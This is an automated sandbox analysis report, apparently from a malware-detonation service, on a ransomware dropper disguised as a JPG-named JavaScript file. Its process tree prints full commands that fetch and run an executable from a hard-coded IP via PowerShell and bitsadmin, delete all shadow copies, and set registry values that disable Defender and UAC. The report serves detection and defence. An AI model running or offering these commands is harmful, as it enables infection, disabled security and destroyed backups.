508ecbe94c4c220f37d3515787221daaa0e897f9b728082c72be80fe355b5ea8

General

Target

PIC180168.jpg.js
Size

253KB
MD5

2c0a6e6f385e471bdb870a723e33cc4d
SHA1

07415191a13e6943eb2e0f41bdf6cf7acfa70156
SHA256

6389e3c49b6f4009ca0f1631436d481065a3b3cfab7a15a073edbb61dd971c73
SHA512

39ca7bbd702a4aede2f57406d57cf1e7a05128e2723372fe084e7db9bf69594fe904cfd5d6f6a92d4b95fda9edd575d10977a9f8b52ae526fbf19fc204746048

Score

10^/10

evasion trojan ransomware persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://217.8.117.63/tspm.exe

Signatures

Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

1288 bitsadmin.exe

pid	process
1288	bitsadmin.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 3 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

taskhostw.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	taskhostw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	taskhostw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	taskhostw.exe

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

2537425072.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	2537425072.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	2537425072.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

wscript.execmd.execmd.exepowershell.exe8468468468.exetaskhostw.exe2537425072.exe

description	pid	process	target process
PID 504 wrote to memory of 808	504	wscript.exe	cmd.exe
PID 504 wrote to memory of 808	504	wscript.exe	cmd.exe
PID 504 wrote to memory of 1000	504	wscript.exe	cmd.exe
PID 504 wrote to memory of 1000	504	wscript.exe	cmd.exe
PID 808 wrote to memory of 1184	808	cmd.exe	powershell.exe
PID 808 wrote to memory of 1184	808	cmd.exe	powershell.exe
PID 1000 wrote to memory of 1288	1000	cmd.exe	bitsadmin.exe
PID 1000 wrote to memory of 1288	1000	cmd.exe	bitsadmin.exe
PID 1184 wrote to memory of 2672	1184	powershell.exe	8468468468.exe
PID 1184 wrote to memory of 2672	1184	powershell.exe	8468468468.exe
PID 1184 wrote to memory of 2672	1184	powershell.exe	8468468468.exe
PID 2672 wrote to memory of 4032	2672	8468468468.exe	taskhostw.exe
PID 2672 wrote to memory of 4032	2672	8468468468.exe	taskhostw.exe
PID 2672 wrote to memory of 4032	2672	8468468468.exe	taskhostw.exe
PID 4032 wrote to memory of 3664	4032	taskhostw.exe	2537425072.exe
PID 4032 wrote to memory of 3664	4032	taskhostw.exe	2537425072.exe
PID 4032 wrote to memory of 3664	4032	taskhostw.exe	2537425072.exe
PID 3664 wrote to memory of 736	3664	2537425072.exe	wmic.exe
PID 3664 wrote to memory of 736	3664	2537425072.exe	wmic.exe
PID 3664 wrote to memory of 736	3664	2537425072.exe	wmic.exe
PID 3664 wrote to memory of 2884	3664	2537425072.exe	vssadmin.exe
PID 3664 wrote to memory of 2884	3664	2537425072.exe	vssadmin.exe
PID 3664 wrote to memory of 2884	3664	2537425072.exe	vssadmin.exe
PID 3664 wrote to memory of 1336	3664	2537425072.exe	wmic.exe
PID 3664 wrote to memory of 1336	3664	2537425072.exe	wmic.exe
PID 3664 wrote to memory of 1336	3664	2537425072.exe	wmic.exe
PID 3664 wrote to memory of 2300	3664	2537425072.exe	vssadmin.exe
PID 3664 wrote to memory of 2300	3664	2537425072.exe	vssadmin.exe
PID 3664 wrote to memory of 2300	3664	2537425072.exe	vssadmin.exe
PID 3664 wrote to memory of 3824	3664	2537425072.exe	wmic.exe
PID 3664 wrote to memory of 3824	3664	2537425072.exe	wmic.exe
PID 3664 wrote to memory of 3824	3664	2537425072.exe	wmic.exe
PID 3664 wrote to memory of 3564	3664	2537425072.exe	vssadmin.exe
PID 3664 wrote to memory of 3564	3664	2537425072.exe	vssadmin.exe
PID 3664 wrote to memory of 3564	3664	2537425072.exe	vssadmin.exe

Suspicious use of AdjustPrivilegeToken 67 IoCs

Processes:

powershell.exewmic.exevssvc.exewmic.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeIncreaseQuotaPrivilege	736	wmic.exe
Token: SeSecurityPrivilege	736	wmic.exe
Token: SeTakeOwnershipPrivilege	736	wmic.exe
Token: SeLoadDriverPrivilege	736	wmic.exe
Token: SeSystemProfilePrivilege	736	wmic.exe
Token: SeSystemtimePrivilege	736	wmic.exe
Token: SeProfSingleProcessPrivilege	736	wmic.exe
Token: SeIncBasePriorityPrivilege	736	wmic.exe
Token: SeCreatePagefilePrivilege	736	wmic.exe
Token: SeBackupPrivilege	736	wmic.exe
Token: SeRestorePrivilege	736	wmic.exe
Token: SeShutdownPrivilege	736	wmic.exe
Token: SeDebugPrivilege	736	wmic.exe
Token: SeSystemEnvironmentPrivilege	736	wmic.exe
Token: SeRemoteShutdownPrivilege	736	wmic.exe
Token: SeUndockPrivilege	736	wmic.exe
Token: SeManageVolumePrivilege	736	wmic.exe
Token: 33	736	wmic.exe
Token: 34	736	wmic.exe
Token: 35	736	wmic.exe
Token: 36	736	wmic.exe
Token: SeBackupPrivilege	1016	vssvc.exe
Token: SeRestorePrivilege	1016	vssvc.exe
Token: SeAuditPrivilege	1016	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1336	wmic.exe
Token: SeSecurityPrivilege	1336	wmic.exe
Token: SeTakeOwnershipPrivilege	1336	wmic.exe
Token: SeLoadDriverPrivilege	1336	wmic.exe
Token: SeSystemProfilePrivilege	1336	wmic.exe
Token: SeSystemtimePrivilege	1336	wmic.exe
Token: SeProfSingleProcessPrivilege	1336	wmic.exe
Token: SeIncBasePriorityPrivilege	1336	wmic.exe
Token: SeCreatePagefilePrivilege	1336	wmic.exe
Token: SeBackupPrivilege	1336	wmic.exe
Token: SeRestorePrivilege	1336	wmic.exe
Token: SeShutdownPrivilege	1336	wmic.exe
Token: SeDebugPrivilege	1336	wmic.exe
Token: SeSystemEnvironmentPrivilege	1336	wmic.exe
Token: SeRemoteShutdownPrivilege	1336	wmic.exe
Token: SeUndockPrivilege	1336	wmic.exe
Token: SeManageVolumePrivilege	1336	wmic.exe
Token: 33	1336	wmic.exe
Token: 34	1336	wmic.exe
Token: 35	1336	wmic.exe
Token: 36	1336	wmic.exe
Token: SeIncreaseQuotaPrivilege	3824	wmic.exe
Token: SeSecurityPrivilege	3824	wmic.exe
Token: SeTakeOwnershipPrivilege	3824	wmic.exe
Token: SeLoadDriverPrivilege	3824	wmic.exe
Token: SeSystemProfilePrivilege	3824	wmic.exe
Token: SeSystemtimePrivilege	3824	wmic.exe
Token: SeProfSingleProcessPrivilege	3824	wmic.exe
Token: SeIncBasePriorityPrivilege	3824	wmic.exe
Token: SeCreatePagefilePrivilege	3824	wmic.exe
Token: SeBackupPrivilege	3824	wmic.exe
Token: SeRestorePrivilege	3824	wmic.exe
Token: SeShutdownPrivilege	3824	wmic.exe
Token: SeDebugPrivilege	3824	wmic.exe
Token: SeSystemEnvironmentPrivilege	3824	wmic.exe
Token: SeRemoteShutdownPrivilege	3824	wmic.exe
Token: SeUndockPrivilege	3824	wmic.exe
Token: SeManageVolumePrivilege	3824	wmic.exe
Token: 33	3824	wmic.exe

Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

1 1184 powershell.exe

flow	pid	process
1	1184	powershell.exe

Windows security bypass 2 TTPs 6 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

taskhostw.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	taskhostw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	taskhostw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	taskhostw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	taskhostw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	taskhostw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	taskhostw.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

2537425072.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2537425072.exe

Adds Run entry to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

8468468468.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Host Process for Windows Tasks = "C:\\Windows\\265618363602\\taskhostw.exe"	8468468468.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\Host Process for Windows Tasks = "C:\\Windows\\265618363602\\taskhostw.exe"	8468468468.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Drops file in Windows directory 3 IoCs

Processes:

8468468468.exe

description	ioc	process
File created	C:\Windows\265618363602\taskhostw.exe	8468468468.exe
File opened for modification	C:\Windows\265618363602\taskhostw.exe	8468468468.exe
File opened for modification	C:\Windows\265618363602	8468468468.exe

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe

Suspicious behavior: EnumeratesProcesses 613 IoCs

Processes:

powershell.exe2537425072.exe

pid	process
1184	powershell.exe
1184	powershell.exe
1184	powershell.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe
3664	2537425072.exe

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

Processes:

2537425072.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	2537425072.exe

Executes dropped EXE 3 IoCs

Processes:

8468468468.exetaskhostw.exe2537425072.exe

pid process

2672 8468468468.exe
4032 taskhostw.exe
3664 2537425072.exe
Windows security modification 2 TTPs 1 IoCs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

taskhostw.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AutoUpdateDisableNotify = "1" taskhostw.exe
Drops desktop.ini file(s) 1 IoCs

Processes:

2537425072.exe

description ioc process

File opened for modification \??\Z:\$RECYCLE.BIN\S-1-5-21-1231583446-2617009595-2137880041-1000\desktop.ini 2537425072.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

11 api.myip.com
13 api.myip.com
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exe

pid process

2884 vssadmin.exe
2300 vssadmin.exe
3564 vssadmin.exe

pid	process
2672	8468468468.exe
4032	taskhostw.exe
3664	2537425072.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AutoUpdateDisableNotify = "1"	taskhostw.exe

description	ioc	process
File opened for modification	\??\Z:\$RECYCLE.BIN\S-1-5-21-1231583446-2617009595-2137880041-1000\desktop.ini	2537425072.exe

flow	ioc
11	api.myip.com
13	api.myip.com

pid	process
2884	vssadmin.exe
2300	vssadmin.exe
3564	vssadmin.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\PIC180168.jpg.js
1⤵
- Suspicious use of WriteProcessMemory
PID:504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspm.exe','C:\Users\Admin\AppData\Local\Temp\8468468468.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\8468468468.exe'
2⤵
- Suspicious use of WriteProcessMemory
PID:808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspm.exe','C:\Users\Admin\AppData\Local\Temp\8468468468.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\8468468468.exe'
3⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1184

C:\Users\Admin\AppData\Local\Temp\8468468468.exe
"C:\Users\Admin\AppData\Local\Temp\8468468468.exe"
4⤵
- Suspicious use of WriteProcessMemory
- Adds Run entry to start application
- Drops file in Windows directory
- Executes dropped EXE
PID:2672

C:\Windows\265618363602\taskhostw.exe
C:\Windows\265618363602\taskhostw.exe
5⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious use of WriteProcessMemory
- Windows security bypass
- Executes dropped EXE
- Windows security modification
PID:4032

C:\Users\Admin\AppData\Local\Temp\2537425072.exe
C:\Users\Admin\AppData\Local\Temp\2537425072.exe
6⤵
- UAC bypass
- Suspicious use of WriteProcessMemory
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- System policy modification
- Executes dropped EXE
- Drops desktop.ini file(s)
PID:3664

C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:736

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
7⤵
- Interacts with shadow copies
PID:2884

C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1336

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
7⤵
- Interacts with shadow copies
PID:2300

C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:3824

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
7⤵
- Interacts with shadow copies
PID:3564

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer 4g44h4wh4hwdw /download /priority high http://217.8.117.63/tspm.exe C:\Users\Admin\AppData\Local\Temp\24624627.exe&start C:\Users\Admin\AppData\Local\Temp\24624627.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1000

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer 4g44h4wh4hwdw /download /priority high http://217.8.117.63/tspm.exe C:\Users\Admin\AppData\Local\Temp\24624627.exe
3⤵
- Download via BitsAdmin
PID:1288